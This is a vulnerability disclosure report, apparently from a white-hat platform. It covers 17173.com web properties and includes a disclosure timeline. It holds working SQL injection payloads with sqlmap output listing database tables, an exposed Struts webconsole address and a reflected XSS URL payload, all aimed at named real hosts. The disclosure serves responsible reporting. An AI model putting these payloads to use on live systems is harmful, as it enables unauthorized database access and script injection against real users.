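2015-05-24: Details reported to the vendor; awaiting vendor handling
2015-05-26: Vendor confirmed; details disclosed to the vendor only
2015-06-05: Details disclosed to core white hats and experts in related fields
2015-06-15: Details disclosed to regular white hats
2015-06-25: Details disclosed to intern white hats
2015-07-10: Details disclosed to the public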
A man without a name trains hard with his sword
0x01: POST injection gc.17173.com/GameDetailid=39
0x02: POST injection http://gc.17173.com/Lessonstype=2
Parameter: id (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (2699=2699) THEN 2699 ELSE 2699*(SELECT 2699FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FSup)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7a71,0x4a575749545043697a6b,0x716a6a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
-----
[21:24:52] [INFO] testing MySQL
[21:24:52] [INFO] confirming MySQL
[21:24:52] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
[21:24:52] [INFO] fetching tables for database: 'GC_DATA'
[21:24:52] [INFO] the SQL query used returns 56 entries
Database: GC_DATA
[56 tables]
+----------------------------+
| DT_BAT_DOWNLOAD            |
| DT_COM_AREA                |
| DT_COM_CONFIG              |
| DT_COM_COUNTRY             |
| DT_COM_DEVICE              |
| DT_COM_DEVICE_CONFIG       |
| DT_COM_PROVINCE            |
| DT_COM_SCHOOL              |
| DT_COM_VENDOR              |
| DT_ENL_WX_KEYWORD          |
| DT_ENL_WX_MENU             |
| DT_ENL_WX_REPLY            |
| DT_ENL_WX_REPLY_ITEM       |
| DT_ENL_WX_REPLY_KEYWORD    |
| DT_LGC_ACTIVITY            |
| DT_LGC_BOUNTY              |
| DT_LGC_EVENT               |
| DT_LGC_FEEDBACK            |
| DT_LGC_GOODS               |
| DT_LGC_GUIDE               |
0x03: Unauthorized access to webconsole http://220.181.143.170:81//struts/webconsole.html
0x04: IIS short name vulnerability http://chibi.db.17173.com
0x05: Reflected XSS http://gc.17173.com/web/reward/Reward.wa?do=--%3E%27%22%3E%3Csvg/onload=alert(1)%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&id=2
You probably know this better than I do..
Severity: Medium
Vulnerability Rank: 8
Confirmation time: 2015-05-26 18:44
Thanks for the support!!
None yet